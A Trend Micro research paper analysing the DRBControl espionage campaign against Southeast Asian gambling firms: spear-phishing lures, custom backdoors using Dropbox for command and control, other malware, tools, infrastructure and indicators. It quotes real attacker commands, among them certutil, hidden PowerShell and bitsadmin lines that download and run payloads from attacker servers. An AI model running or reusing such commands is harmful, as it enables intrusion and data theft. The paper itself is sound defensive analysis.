----- **TREND MICRO LEGAL DISCLAIMER** The information provided herein is for general information and educational purposes only. It is not intended and should not be construed to constitute legal advice. The information contained herein may not be applicable to all situations and may not reflect the most current situation. Nothing contained herein should be relied on or acted upon without the benefit of legal advice based on the particular facts and circumstances presented and nothing herein should be construed otherwise. Trend Micro reserves the right to modify the contents of this document at any time without prior notice. Translations of any material into other languages are intended solely as a convenience. Translation accuracy is not guaranteed nor implied. If any questions arise related to the accuracy of a translation, please refer to the original language official version of the document. Any discrepancies or differences created in the translation are not binding and have no legal effect for compliance or enforcement purposes. Although Trend Micro uses reasonable efforts to include accurate and up-to-date information herein, Trend Micro makes no warranties or representations of any kind as to its accuracy, currency, or completeness. You agree that access to and use of and reliance on this document and the content thereof is at your own risk. Trend Micro disclaims all warranties of any kind, express or implied. Neither Trend Micro nor any party involved in creating, producing, or delivering this document shall be liable for any consequence, loss, or damage, including direct, indirect, special, consequential, loss of business profits, or special damages, whatsoever arising out of access to, use of, or inability to use, or in connection with the use of this document, or any errors or omissions in the content thereof. Use of this information constitutes acceptance for use in an “as is” condition. Published by **Trend Micro Research** Written by **Daniel Lunghi, Cedric Pernet,** **Kenney Lu, and Jamz Yaneza** Stock image used under license from Shutterstock.com ### Contents #### 4 ###### The Initial Compromise: Spear Phishing #### 7 ###### Malware Analysis #### 18 ###### Other Malware Families Used #### 21 ###### Post-Exploitation Tools #### 22 ###### Infrastructure Analysis #### 24 ###### Links with Known Threat Actors #### 26 ###### Conclusion ----- In the summer of 2019, Talent-Jump Technologies, Inc. contacted Trend Micro regarding a backdoor that they discovered after performing an incident response operation on a company based in the Philippines. Trend Micro provided further intelligence and context on this particular backdoor. An in-depth analysis revealed that the backdoor was being used by an advanced persistent threat (APT) actor that we dubbed “DRBControl,” as we could not find anything related to the group in our databases or public malware repositories. Our analysis also found that the threat actor uses a number of additional backdoors and post-exploitation tools, as well as some spear-phishing documents that could have been used during the initial phase of a related campaign. One of the backdoors was of particular interest, as it used the file hosting service Dropbox as a command-and-control (C&C) channel. We shared our analysis with Dropbox, which has since been working with Trend Micro regarding the issues. We observed that the threat actor behind this campaign had very specific targets, as it only goes after gambling and betting companies in Southeast Asia. We have been made aware that Europe and the Middle East regions are also being targeted, but we could not confirm this information at the time of writing. The exfiltrated data was mostly comprised of databases and source codes, which leads us to believe that the campaign is used for cyberespionage or gaining competitive intelligence. Some of the backdoors were unknown to us, which could suggest that it is a previously unreported group. However, we also managed to link it to some known threat actors. This research paper details the different stages of this campaign, including the initial spear-phishing emails, a detailed analyses of the backdoors, and a list of the multiple post-exploitation tools. It also covers observations on the threat actor’s activities and infrastructure, including connections with known APT groups. ----- ## The Initial Compromise: Spear Phishing In targeted attacks, spear phishing is a common infection vector employed[1] by threat actors[2] looking to gain an initial foothold in their target’s infrastructure. Getting the targets’ email addresses is relatively easy, using generic email addresses or specific individuals’ email addresses. The campaign we expose in this research is not an exception: The threat actors use spear phishing to trick the recipient into opening a .DOCX document. The spear-phishing campaign we witnessed was active in May 2019. We could find two different (in terms of language) — but very similar — kinds of phishing content. The social engineering used in this campaign appears to be quite straightforward and efficient in terms of meeting the threat actors’ goals. The threat actor’s spear-phishing attack targets the organization’s support team. From: 2931436431@{BLOCKED}q[.]com To: support-@ The subject changed depending on the language that the targeted support team uses. The _support-_ _cn team, for instance, received an email with the Chinese subject “注册不了的截图” (“cannot register_ screenshot”), while the support-jp team received a similar email with “error screenshot” as the subject. Moreover, documents are displayed differently. Figure 1. Spear-phishing document sent to the Japanese support team ----- Figure 2. Spear-phishing document sent to the Chinese support team Support teams are used to receiving requests from customers, and emails that contain screen captures from users may also be commonplace for these teams. However, support teams should be wary of how unusual it could be for a user to send a .DOCX file that contains the screenshot, which requires additional user action (a double-click, in this case) only to show the image. We were able to find at least three different versions of the infecting documents. The first version, when double-clicked by the user, embeds an executable file that is launched and acts as a dropper for the malware (detected by Trend Micro as Trojan.Win32.CLAMBLING.A). A second version of the document embeds a .BAT file, which also acts as a downloader for the same malware. cd %temp% && certutil -urlcache -split -f http://{BLOCKED}.{BLOCKED}.18.154/debug.exe &&debug.exe Command-line content found in an infecting document, downloading and executing a second-stage malware The third version of the document uses PowerShell to download the malware. cmd /c start powershell.exe -ep Bypass -NoP -NonI -W Hidden (new-object System.Net. WebClient).DownloadFile(‘http://{BLOCKED}.{BLOCKED}.18.154/test.cab’,’%TEMP%\\test. cab’); expand ‘%temp%\\test.cab’ %temp% -f:* ;Start-Process ‘%TEMP%\\config.exe’ Using PowerShell to download and execute a second-stage malware Our analysis revealed that the first two versions execute the same file (detected as Trojan.Win32. CLAMBLING.A) on the infected system. We could not retrieve the test.cab file from the third version, but we suspect a similar final payload. ----- Figure 3. Malicious document that tricks the user to double-click on the picture and run malicious code (top: “Registration information error picture” bottom: “Double-click to enlarge picture”) We also found a weaponized document from July 2017 that used a similar PowerShell code to drop a backdoor (analyzed later in this research as type 2), but we could not search for it in our telemetry. Similarly, it also tricked the user into double-clicking on an image, which triggers the code execution. ----- ## Malware Analysis This campaign uses two major backdoors that were previously unknown to us. We also found some known malware families such as PlugX and HyperBro, as well as many custom post-exploitation tools. Below we describe the loading, persistence, and features of the two backdoors. ##### Type 1 Backdoor ###### Loading the Payload This backdoor is written in the C++ language with classes that inherit from virtual classes. The backdoor is also modular, allowing for expansion with the use of plugins. ###### Current Method: DLL Side-Loading To load this backdoor, the threat actor launches the legitimate file _MsMpEng.exe, which is signed by_ Microsoft and described as an “Antimalware Service Executable.” This executable is vulnerable to DLL side-loading,[3] wherein an unintended DLL is loaded on a program. In this case, the malicious actor takes advantage of it by storing a file named _mpsvc.dll in the same directory. That DLL then opens_ a third filename, _mpsvc.mui, which contains the obfuscated backdoor, decodes it, and loads it into a_ _svchost.exe process._ We found two RAR archive files (detected as Trojan.Win64.CLAMBLING.A) in the wild containing the aforementioned files. The modification time of the embedded files is 2019-07-25. ###### Old Method: Patching of a Legitimate File Interestingly, we observed a different technique being used in an older version of this backdoor. The threat actor manually patched some bytes of a legitimate installer for the Chinese archiving software “HaoZip,” (commonly used in China as an alternative to WinRAR and WinZip) to redirect the code flow to a function appended at the end of the binary. ----- Figure 4. Legitimate HaoZip installer code Figure 5. Patched code that redirects the execution flow The added function resolves some pointers to several WinAPI functions by comparing them to a hash generated via a simple custom algorithm. The code then loads into memory the binary overlay, which contains a routine to decompress and load the final payload. The routine also checks if the process is being debugged by comparing the third bit of the PEB with 0. ----- Figure 6. Debugger check via PEB ###### Backdoor Features The dropped payload is a backdoor written in C++. It embeds a configuration file in clear text that contains the C&C, the path where the file will be copied, and the service name that will be created. If no arguments are provided, the file is copied to the path specified in the configuration, its attributes are set to the system and hidden, and a value is added to a “Run” registry key to launch it during the next boot. Figure 7. AutoRun addition It handles the following arguments: - P: Create a suspended svchost.exe process, inject code, and resume - O: Initialize plug-ins and backdoor features - U: Bypass user account control (UAC) with passuac.dll file Run-time type information (RTTI) is present in the executable, allowing us to obtain the real classes’ names: - CHPPlugin: Virtual class implemented by every “plug-in” class - CHPCmd: Class handling command execution through the terminal - CHPExplorer: Class providing functions to browse directories, enumerate network shares, read, write, and execute files - CHPAvi: Class providing recording of the screen content in AVI format and AVI files enumeration - CHPKeyLog: Class providing keylogging feature (discussed later) - CHPPipe: Class providing functions that handle named pipes ----- - CHPProcess: Class providing functions to enumerate and terminate processes - CHPProxy: Class adding proxy support - CHPRegedit: Class providing functions to handle registry keys (enumerate, copy, set, delete) - CHPScreen: Class handling screenshot capture feature - CHPService: Class providing functions to handle services (create, delete, modify, query, start) - CHPNet: Virtual class implemented by every “communication protocol” class - CHPHttp: Network class related to HTTP protocol handling - CHPTcp: Network class related to TCP protocol handling - CHPUdp: Network class related to UDP protocol handling - CHPTelnet: Network class related to Telnet protocol handling The malware also sends the infected system’s information (listed below) to the C&C server: - Hostname (or IP address if no hostname is found) - Computer name - Current privileges (System/Admin/User) - Windows version - Current time - Fixed string (likely the campaign identifier) Before sending the information, the data is obfuscated by swapping each character with its position in a fixed substitution table. Figure 8. Substitution algorithm ----- ###### The Use of Dropbox in Its Infection Chain An important feature appeared in the recent version of this backdoor: A new thread that adds a new C&C channel by using the Dropbox API. The thread waits 30 minutes before doing anything, then gathers the following information about the host: - Local IP address - Computer name - Username - Operating system (OS) version - Malware version (fixed string; we saw values ranging from 1.0 to 9.0) - Content of the registry key: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt\strDataDir + “wallet.dat” - Existence: “YES” if the wallet file exists, “NO” if otherwise This information is written in plain text to Dropbox by using the API in a file named with the current date and time. The malware then searches for a file named bin.asc in a specific Dropbox directory. If this file exists, the malware checks if it starts with “GIF” then decrypts the rest of it, starts a suspended svchost. exe process, writes the decrypted shellcode to it, and resumes its execution. We found different payloads being delivered through Dropbox that will be covered in a separate section below. It is worth noting that the threat actor used multiple Dropbox repositories, each one storing different information. They were split as the following: - Backdoor and storage of target user’s workstation information - Storage of commands, results, heartbeats, and post-exploitation tools - Stolen files from target user’s computer The versioning shows the malware’s rapid pace of development — Version 1.0 was used in late May 2019, version 8.0 in late July 2019, and version 9.0 at the beginning of October 2019. ----- WinDRM/Firewall Enter side-loading Unpack loader in Load MUI file to Execute unpack load Start svchost.exe Start DLL memory memory in MUI file and inject DLL svchost Connect to C&C Wait for command Start Information Upload info to Check Dropbox Start svchost.exe Found gathering Dropbox payload and inject payload svchost (second channel) Unpack and execute Load second payload Unpack and execute Remote control via Start first payload from Dropbox second payload Dropbox Figure 9. Code flow of the latest version of the backdoor ###### Keylogger Feature The keystrokes are logged to the file %USERPROFILE%\AppData\Roaming\(IID).log, while the clipboard is stored in the file %USERPROFILE%\AppData\Roaming\(IID).pas. They are obfuscated via a very simple algorithm: Figure 10. Keylogger encryption algorithm After decryption, the files will look like this: Figure 11. Sample of logged keystrokes ----- Figure 12. Sample of a logged clipboard It is worth noting that the first sample we found has no campaign name or version number, and the Dropbox feature is not present. It also embeds only two plug-ins (CHPCmd and CHPExplorer) and two network plug-ins (CHPTcp and CHPHttp), and does not implement the UAC bypass feature. This is the sample that we found being dropped by spear-phishing documents. It should also be noted that checking for Bitcoin wallets was removed in version 9.0. As previously mentioned, the first backdoor is downloaded from Dropbox, and itself uses Dropbox as its C&C channel. The backdoor handles different commands, as listed below: - 0x02: Enumerates drives - 0x03: Enumerates files - 0x04: Executes file and sends output to C&C - 0x05: File operation: º 0x01: Moves º 0x02: Copies º 0x03: Deletes º 0x04: Renames - 0x06: Uploads file to Dropbox - 0x07: Downloads file from Dropbox - 0x08: Executes command via console - 0x09: Runs binary through process hollowing When starting, a machine ID is generated and stored in HKEY_LOCAL_MACHINE\Software\Classes\ CLSID\. A directory named is also created in Dropbox, which will be used to store files harvested from the victim. The code uses three hardcoded filenames: - yasHPHFJ: Contains commands to execute - Csaujdnc: Contains the result of the execution - eLHgZNBH: Heartbeat ----- ##### Dropbox-Downloaded Backdoor Loader Since the Dropbox-downloaded backdoor is loaded into memory by the type 1 malware, it cannot run alone. Consequently, we found another malware family that has the unique purpose of running those Dropbox backdoors. This backdoor also uses the DLL side-loading technique,[4] this time abusing a vulnerability in some versions of the legitimate Windows service IKEEXT, which is used for IPsec connections.[5, 6] This service loads a DLL named _wlbsctrl.dll from directories in the PATH variable. We saw the actor copying a malicious_ wlbsctrl.dll file to the following directories: - C:\ProgramData\Oracle\Java\javapath\ - C:\ProgramData\ - C:\Users\Administrator\AppData\Roaming\npm\ - C:\ProgramData\GooGet\ - C:\php\ - C:\Windows\System32\ The code is very short; the malware will retrieve pointers to some specific functions, parse the header of the file to be loaded looking for some pointers, and pass them all as arguments to the Dropbox backdoor. Dropbox has since clarified that concerned tokens were expired in August. ##### Communication Redirection We found a sample related to this case. The sample implements some of the classes mentioned earlier with a few more: - CHPHttp - CHPNet - CHPTcp - CHPUdp - CHPListener: Virtual class implemented by network listeners - CTcpListener: Class redirecting TCP communications - CUdpListener: Class redirecting UDP communications ----- This sample works as a network redirector and interprets four parameters: - l: Listen port - p: Remote server IP address - r: Remote server port - m: Protocol (TCP or UDP) The traffic of the specific protocol arriving on the specified port will be redirected to the remote IP and port. The compilation timestamp of this sample is 2019-08-24. ##### Type 2 Backdoor ###### Loading the Payload The second backdoor type that we found was also written in the C++ language. To unpack this backdoor, the threat actor uses the Microsoft executable that is vulnerable to DLL side-loading, similar to the one used in the type 1 backdoor. A compressed and obfuscated version of the backdoor is stored in a file with a fake .RTF extension. That file is loaded and unpacked by a specially crafted mpsvc.dll file, which is being loaded by the Microsoft signed file MsMpEng.exe. ###### Backdoor Features This backdoor uses a configuration file that contains information such as the C&C domain and connection port, the directory and filename where the malware is copied, and the name and description of the service that is created for persistence. The configuration is obfuscated by a simple algorithm embedded in the PE file. ----- Figure 13. Config decryption routine When the malware is first run, the obfuscated configuration is appended to a randomly generated GUID and stored in the HKLM (or HKCU)\SOFTWARE\Plus registry key inside the CFG value. When the backdoor is run without arguments, it will create a copy of itself in the directory specified in the configuration file. The malware then sets its persistence mechanism. Depending on the user privilege, it will either create a service or modify the HKEY_CURRENT_USER\Microsoft\Windows\Run registry key to run itself with the –PO argument. If necessary, it will also run itself with the –UC argument to bypass UAC. The following arguments are handled (one at a time): - PO: Injects backdoor into svchost.exe via process hollowing and runs it with “-OE” argument - OE: Initializes all plug-ins and starts communication with C&C; one of the threads runs the backdoor with the –KG argument on every RDP session - UC: UAC bypass - KG: Keylogging feature initialization (discussed later) Like in the type 1 backdoor, the RTTI information is available in this sample. The following classes were observed: - CNet: Virtual class implemented by other network-related classes - CNetHttp: Class related to HTTP communication protocol - CNetTcp: Class related to TCP communication protocol ----- - CPlugin: Virtual class implemented by other classes - CFileManager: Class related to file handling (read, write, list, execute, etc.) - CKeylog: Class related to keylogging feature (discussed later) - CMuture: Class handling console input and output - CPortMap: Class handling socket binding - CShell: Class handling command execution via _cmd.exe; input and output are handled through_ named pipes ###### Keylogger Feature A thread makes sure that the backdoor runs with the “-KG” parameter inside every RDP session. Figure 14. Backdoor set to run with the “-KG” parameter A file named %USERNAME%.rpt is created in the same directory as the malware using this output format: _%username% | [YYYY-mm-dd HH:MM:sss] | | . The file is obfuscated_ before being written to disk using a simple algorithm: Figure 15. %Username%.rpt obfuscation routine We found three samples related to this backdoor. The only difference was the embedded configuration file. The samples, together with their C&Cs, file paths, and service names, can be found in the IoCs. We also discovered an old version of this backdoor being dropped by a weaponized Microsoft Word document from July 2017. The C++ classes were named similarly. This suggests that DRBControl is not a newcomer. ----- ## Other Malware Families Used We found several other malware families related to DRBControl. The found families are a mix of widely known and less common malware. ##### PlugX RAT We found a variant of the well-known PlugX malware using the same C&C utilized by a type 1 backdoor sample from the campaign. The hardcoded version number in the binary is “0x20120123” and the configuration file is 0x150C bytes long. The C&Cs are www.kkxx88866[.]com and www.betwln520[.]com, and the file is copied under the %ALLUSERSPROFILE%\Mico directory. Some strings from the regular PlugX have been slightly modified, likely in an attempt to evade simple detection rules. As examples, “JoProcBroadcast” became “J0Pr0cBr0adcast”, and “OlProcNotify” became “0lPr0cN0tify”. The malware is also dropped via the DLL side-loading technique. Although this time, the vulnerable file is a legitimate Chrome installer that loads a malicious _goopdate.dll file.[7, 8] This .DLL file decrypts,_ decompresses, and loads a third file named _license.rtf, which is the final PlugX malware. The similar_ naming is yet another link to the TTP of DRBControl. The malware was found because of the shared infrastructure, but we do not have any insight into the way or the time it was used. Some hints point toward a very old sample — we found it in a .ZIP file named _KB3023607.zip, which relates to a fix that Microsoft issued in February 2015.[9] Moreover, the compilation_ date of the unpacked sample indicates 2015-10-14, but the modification date of license.rtf in the ZIP file is 2018-08-10. It also seems that no IP address has been assigned to the C&C domains until March 2018. ##### Trochilus RAT Two samples belonging to the Trochilus RAT family can be linked to domain names that DRBControl used. The samples are Nullsoft Scriptable Install System (NSIS) installers that drop two files: rpcss.dll and _data.dat, which is the backdoor in an encrypted format._ ----- Both samples copy the files to %ALLUSERPROFILE%\Medialoader, and, if running with admin privileges, create a service named medialoader that runs the DLL at boot time. The setup443.exe file was hosted at the address hxxp://juchaoba[.]com/plus/guestbook/images/setup443.exe. We speculate that the site was compromised to host the setup443.exe file. The _diskshawin.exe file is dropped by an SFX RAR file, which drops three files (run64.bat,_ _csres.exe,_ and diskshawin.exe) into %SystemRoot%\Fonts and launches run64.bat. Csres.exe is a custom installer, which, based on the user privileges, will either create a service named SESSRV, use UAC bypass, or just run the malware during every RDP session. This installer creates several mutexes that have been seen in other known malware families linked to domain names reportedly used by the Winnti group.[10] We discuss this later in the Links with Known Threat Actors section. ##### MFC Keyloggers We also found two additional malware samples using the Microsoft Foundation Class (MFC) library and has links to the domain name shopingchina[.]net used in this campaign. The purpose is to capture clipboard and keystroke data and send it to a PHP script hosted on the C&C. ##### HyperBro The custom in-memory HyperBro backdoor[11] was also found to make up DRBControl’s arsenal. Loading the payload is similar to the type 1 backdoor, which involves abusing a legitimate Microsoft executable, but this time the MsMpEng.exe executable is a 32-bit file. The encrypted backdoor is stored in a file named _thumb.dat, which is decrypted and loaded by the_ mpsvc.dll file. An additional config.ini file contains a GUID. By looking at the RTTI class names, we found classes that were not present in a Palo Alto blog post[12] on HyperBro: - VTClipboardInfo - VTClipboardMgr - VTFileRename - VTFileRetime - VTKeyboardInfo - VTKeyboardMgr - VTRegeditKeyInfo - VTRegeditMgr - VTRegeditValueInfo ----- The class VTFileDataRes was removed, and the URI pattern to contact the C&C changed from “/ajax” to “/api/v2/ajax”. Another difference was the options passed to the compiler, as our sample did not use a stack cookie (/GS in Visual Studio). The sample contained a hardcoded version number and date of 2.0.9 and “Feb 04 2015.” From an infrastructure point of view, the C&C had striking similarities with the more recent C&C used by the type 1 backdoor, which led us to believe that this sample is related to DRBControl. ##### Cobalt Strike We also found a sample of Cobalt Strike linked to the cdn[.]kkxx888666[.]com subdomain. The same domain name has been used by an old type 1 backdoor and a PlugX sample. ----- ## Post-Exploitation Tools During our research, we found several other tools used by DRBControl. Among its arsenal were a clipboard stealer, wherein the content is encrypted with the same algorithm as the type 1 backdoor; a network traffic tunnel named EarthWorm;[13] a public IP address retriever;[14] an NBTScan tool for enumerating NetBIOS shares; a brute-force tool;[15] and an elevation of privilege tool for exploiting CVE-2017-0213.[16] We also discovered password dumpers, tools for bypassing UAC, and code loaders in the post-exploitation tools. ##### Password Dumpers We found multiple password dumpers in DRBControl’s toolkit. Some of them were known, such as Quarks PwDump and modified versions of Mimikatz that only dump login passwords. Others are based on publicly available source codes.[17, 18] Based on the PDB path, the latter was named NetPwdDump by the malicious actor. Another tool dumps SQLite data from the files stored on the “\Google\Chrome\User Data\Default\Login Data” directory. ##### UAC Bypass Many samples were simple implementations of publicly known techniques for bypassing UAC. Implemented techniques include UAC bypass via elevated .NET applications,[19] Win7Elevate,[20] and eventvwr.exe and registry hijacking.[21] ##### Code Loaders Many of the tools used were simple code loaders. DRBControl might be using them to bypass code execution restrictions or evade security solutions. One of them takes a hostname and a port as the parameter, uses the information to connect to a server, downloads code (probably a position-independent shellcode), and executes it. Another tool, named NetUseEngine on the PDB information, is used to create a service and launch it when the system boots. It takes three parameters: install, special, or uninstall. The malicious actor also wrote a tool to run a command by copying it inside a run.sct file and executing it via the Squiblydoo technique.[22] Others are even simpler, launching c:\programdata\b.bat via WinExec or _CreateProcessA. We even found a b.bat file launching Mimikatz._ ----- ## Infrastructure Analysis There were not many domain names linked to DRBControl, and the infrastructure was diverse. In most cases, we could resolve IP addresses only for the subdomains hardcoded in the malware samples, but the domain names didn’t have IP addresses linked to them. On multiple occasions, different subdomains led to different malware families. For instance, the attacker pointed some domain names to 127.0.0.1, which is a known practice of some threat actors. More recently, the attacker switched to IP addresses that, based on the Whois Lookup record, can be identified within the Google Cloud address space. (It should be noted, however, that this does not necessarily mean a direct abuse to the platform.) When browsing the C&C domain names or IP addresses, we noticed the returned content was a simple HTTP header that redirects the user to a legitimate website such as Google or Dropbox. This is consistent with the malicious domain names that sometimes contained the company names. ##### Review of DRBControl’s Activities DRBControl’s activities can be reviewed based on the commands they sent to 67 different IDs: **List files** **Run command** **Upload file** **Download file** **List drives** **Delete file** **Execute file** **Rename file** **Copy file** 0 1,000 Figure 16. Command type sent by DRBControl ----- |Command|Number of occurrences| |---|---| |netstat -ano tasklist systeminfo query user ipconfig /all whoami reg query “HKEY_CURRENT_USER\Software\ Microsoft\Terminal Server Client\Default” dir wlbsctrl.dll type log.txt set|24 19 19 18 16 15 12 11 10 10| Table 1. Top 10 commands issued by DRBControl through “cmd /c” Of the 51 files that the attacker deleted, the majority were post-exploitation tools. Notably, in two cases, the attacker deleted the file _c:\ProgramData\SxS\NvSmart.hlp, which is known to contain keylogging_ information generated by the PlugX malware. All of the downloaded files were post-exploitation tools. Among the uploaded files, there were many Office and PDF documents, key logs, SQL dumps, browser cookies, and even a KeePass database. Another interesting note is that the download and upload commands included the remote file path as an argument, which allowed us to see how the attacker organizes its files. Some parent directories from which the attacker copied the stolen files were interesting: “C:\Projects\ Dropbox\Test Version\DRBControl\Release\Downloads\”, or “C:\Users\Win2008_x64\Desktop\drb\ Downloads\”. The attacker would then create a directory structure of “[ ]\[ ]+[ ]\” or “()\”. Some of the attacker’s directory names contained Chinese words, such as “备份” (“backup”) and “UAC 提权” (“UAC elevation”). ----- ## Links with Known Threat Actors Our first speculation was that this attacker was new, as we had never seen the type 1 and type 2 backdoors before and did not find infrastructure similarities with other threat actors. However, our analysis revealed some connections to known threat actors, listed below. ##### Winnti Aside from being motivated by profit, the Winnti group has gained notoriety for their involvement in various malicious activities associated with targeted attacks and utilizing self-developed, technically-proficient tools in their attacks.[23] Over the years, Winnti-related activities have suggested that there are likely more than one group of attackers behind the Winnti umbrella.[24] It is highly probable that Winnti is comprised of several closely related threat actors that share tools and parts of attack infrastructures. How closely they work together is still unknown. Some speculate that there might be one central development group providing malware and tools for the others, or that each entity creates its own software that they later share with peers. The first link we found was the mutexes shared between two malware families with different infrastructure. One of the Trochilus samples, named diskshawin.exe, had links to the domain name fn.shopingchina[.]net and is dropped by a custom installer file that uses the following mutexes: - cc5d64b344700e403e2sse - cc5d6b4700e403e2sse - cc5d6b4700032eSS The mutexes were also found in a BbsRat sample, which is named diskwinshadow.exe and contacts the domain name bot.googlerenewals[.]net. The same domain name has been listed in a 2017 Clearsky report on the Winnti group’s activities.[25] ----- The second and third link we found come from two commands issued by the attacker in a compromised machine: - bitsadmin /transfer n http://185.173.92[.]141:33579/i610.exe c:\users\public\wget.exe - bitsadmin /transfer n http://185.173.92[.]141:33579/t32d.exe c:\users\public\wget.exe A look into the passive DNS of the IP address 185.173.92[.]141 revealed that the domain name asia. googlerenewals[.]net was used close to the timeline of our incident. Finally, we searched for executables named _t32d.exe and found a sandbox report for a malware contacting the domain name test3._ facebooknavigation[.]com. Like googlerenewals[.]net, facebooknavigation[.]com was also listed as Winnti related in the aforementioned report. ##### Emissary Panda/LuckyMouse/APT 27 We also found some links with Emissary Panda (a.k.a. LuckyMouse, APT27, and Iron Tiger). The first one involves the use of the HyperBro backdoor, which appears to be exclusive to the threat actor. All reports we found on this backdoor mention campaigns attributed to Emissary Panda.[26, 27] While it is a very loose link, we also noticed that the packed version of HyperBro was named thumb.db in the Emissary Panda case, while the one in this campaign is named thumb.dat. The executable used for DLL side-loading, however, is entirely different. Having found relations with Winnti and Emissary Panda reminded us that we also found some signed malware certificates being shared by both groups in the past. ----- ## Conclusion Attribution is a complicated aspect of cybersecurity, and it is not the goal of this publication. What we have discovered in our analysis, however, is the existence of a significant number of indicators of compromise (IoCs) and intriguing connections with at least two known APT groups. This research delves into the modus operandi and different kinds of malware used by DRBControl, whose goal is to steal source code and data from gambling and betting companies located in Asia. We did not find information regarding attacks in other parts of the world. However, this is not to say that there has been none. The threat actor described here shows solid and quick development capabilities regarding the custom malware used, which appears to be exclusive to them. The campaign exhibits that once an attacker gains a foothold in the targeted entity, the use of public tools can be enough to elevate privileges, perform lateral movements in the network, and exfiltrate data. ###### Trend Micro Solutions Trend Micro™ Deep Discovery™ provides detection, in-depth analysis, and proactive response to today’s stealthy malware and targeted attacks in real-time through specialized engines,[28] custom sandboxing,[29] and seamless correlation across the entire attack lifecycle, even without any engine or pattern update. To defend against spam and email threats,[30] businesses can consider Trend Micro™ endpoint solutions such as Trend Micro Smart Protection Suites[31] and Worry-Free™ Business Security.[32] Trend Micro Deep Discovery™ has an email inspection layer that can protect enterprises by detecting malicious attachments and URLs.[33] Trend Micro™ Deep Security™ and Vulnerability Protection provide virtual patching that protects endpoints from threats that abuses unpatched vulnerabilities.[34,] [35] Trend Micro’s suite of security solutions is powered by XGen™ security,[36] which features high-fidelity machine learning to secure the gateway and endpoint data and applications.[37] XGen™ protects against today’s purpose-built threats that bypass traditional controls, exploit known, unknown, or undisclosed vulnerabilities, and either steal or encrypt personally identifiable data. ----- ###### MITRE ATT&CK Matrix™ |Initial Access|Execution|Persistence|Privilege Escalation| |---|---|---|---| |Spearphishing Attachment|Command-Line Interface Execution through API Execution through Module Load Exploitation for Client Execution PowerShell Scripting Service Execution Signed Binary Proxy Execution User Execution Windows Management Instrumentation|BITS Jobs DLL Search Order Hijacking Hidden Files and Directories New Service Redundant Access Registry Run Keys / Startup Folder|Access Token Manipulation Bypass User Account Control DLL Search Order Hijacking Exploitation for Privilege Escalation New Service Process Injection| |Defense Evasion|Credential Access|Discovery|Lateral Movement| |---|---|---|---| |Access Token Manipulation BITS Jobs Bypass User Account Control Connection Proxy Deobfuscate/Decode Files or Information DLL Search Order Hijacking DLL Side-Loading File Deletion Hidden Files and Directories Masquerading Modify Registry Obfuscated Files or Information Process Hollowing Process Injection Redundant Access Scripting Signed Binary Proxy Execution Software Packing Web Service|Brute Force Credential Dumping Credentials from Web Browsers Input Capture|Account Discovery Application Window Discovery File and Directory Discovery Network Share Discovery Process Discovery Query Registry Remote System Discovery System Information Discovery System Network Configuration Discovery System Network Connections Discovery System Owner/User Discovery System Service Discovery System Time Discovery|Remote File Copy| |Collection|Command And Control|Exfiltration| |---|---|---| |Clipboard Data Data from Local System Data from Network Shared Drive Input Capture Screen Capture|Commonly Used Port Connection Proxy Custom Command and Control Protocol Custom Cryptographic Protocol Data Obfuscation Fallback Channels Multi-Stage Channels Multilayer Encryption Remote File Copy Standard Application Layer Protocol Uncommonly Used Port Web Service|Exfiltration Over Alternative Protocol| ----- ##### Indicators of Compromise (IoCs) ###### Payload |SHA-256|Trend Micro Pattern Detection|Notes| |---|---|---| |a44136c9ae13435882c5c2aded9ed8bd5e8c1a64520ab83a17cffa03ea3852d1 bfd5056cfbec3a43656c2ceb27cacea5de27c7a82f21d2897826ce1e1748666a 3d0d4945275cdbae9911183dd17fb5e118216816e1c9abc2cecfb65c4ef9d708 a219dfc28426bf36af578e2dbc4a65abdae51e0c3df87c4cb3a2c8f9e0088d32 f9759b5046d67d07ed4a0b07316d6797feb2293a8cbd3c4bc78c90269b87fe3f 29e50893c10897684d8b81f0d511d4073442e385d2ab2ee6c9a9c0189851f72c bd278f8fbd5af15beddf5f1d8f7c20bec368fae2e7cb5ef16e2b50434d30a384 c3c70ca2c473e166d0890450c70e3fafdc98f10f2027a1aa0d78a75170df2b69 9b957bfe1bdbed23e5d45d6f30c7d666f2c65af32779d09927dfc0f79f6f7b91 e82e7b6dbf074bb189cd639f70137d3d4350423fd4e84898688920d0110110b8 9e3b82a55d3bd9773aaa50396436aec085eeb34e6efda70d6b2946a571911601 9897e28cd7f1e26eb9115c99188192747ea39fee9aa8c22633e336beeb76f109 cd5a3c0d92b76bd29fbb5dffaab6144487d35d83d3ab3e4ea545a0ea58ca9140 76e41cd6cd30af04fbe540de60fa0f0873d65fb94727b921b2483c5d9e1cbdeb 58597b5469a9b1af44b73937c3c44ce4dcea841a3eff3508dc0bed0bcb2ff10a 46532c3fbd3e73682ea7c4fdec6a26fffa7baff36a78fd821b8bfe7721fc92ef b35e3d9835910c50502cf4753e77b50d279a9f9056f64bd609b865ded8a79d0c 8c03324d303c4bf4f180f400537a307750561de37ed92691d46c09ef2caa22b0 c88196c1ec9d29326cee11d04e73a3f6ce80a2bad5363925fd9520e64727407b 832c5cbe153d7687e8e72a1108bf2f38e88d30de5b9432c5ff8fdef9d190ec02 8bc65935aa19e95b52d7ecc1d5d8f15c0c85fde28d39c0a1844ca90a912cd502 23cd30aaf21d02bde349e6c1761165120c0e2ded626a2de583103e1559e5b9f4 fa10b6cf0bd9de0734ecca6650de214647ec7305af90f9a4dfdc5e092706cb11 021751637a8fff2c48fd543316c25a7090d4ac96f81efb2cfd2a8bb239bafdfd f52b3f5f8213709bb5617fd02e702dee10935eefb96f44e8afa35af17c81d05b d1294a1e043bb882e99f278fa51ceefadc0939fedc47306e475fbdcbb210dc5b 927da2ff9203eb77a66fa7b23f9f1c3655b357fc2418422ed2d5813882a6ae5a 64469d27fec40f50b06812c2d2fdbe5dd73a3b258f304f48f97e9c792e1a0c6f e52034cb8b5f170c8174ea2b9ede2785d093360a57359261e2dfb436cd644038|Backdoor.Win64.CLAMBLING.B Backdoor.Win64.CLAMBLING.B Backdoor.Win64.CLAMBLING.B Backdoor.Win64.CLAMBLING.B Backdoor.Win64.CLAMBLING.B Backdoor.Win64.CLAMBLING.B Backdoor.Win64.CLAMBLING.B Backdoor.Win64.CLAMBLING.B Backdoor.Win32.CLAMBLING.A Backdoor.Win32.CLAMBLING.A Backdoor.Win32.CLAMBLING.A Backdoor.Win32.CLAMBLING.A Backdoor.Win32.CLAMBLING.A Backdoor.Win32.CLAMBLING.A Backdoor.Win32.CLAMBLING.A Backdoor.Win32.CLAMBLING.A Backdoor.Win32.CLAMBLING.A Backdoor.Win32.CLAMBLING.A Backdoor.Win32.CLAMBLING.A Backdoor.Win32.CLAMBLING.A 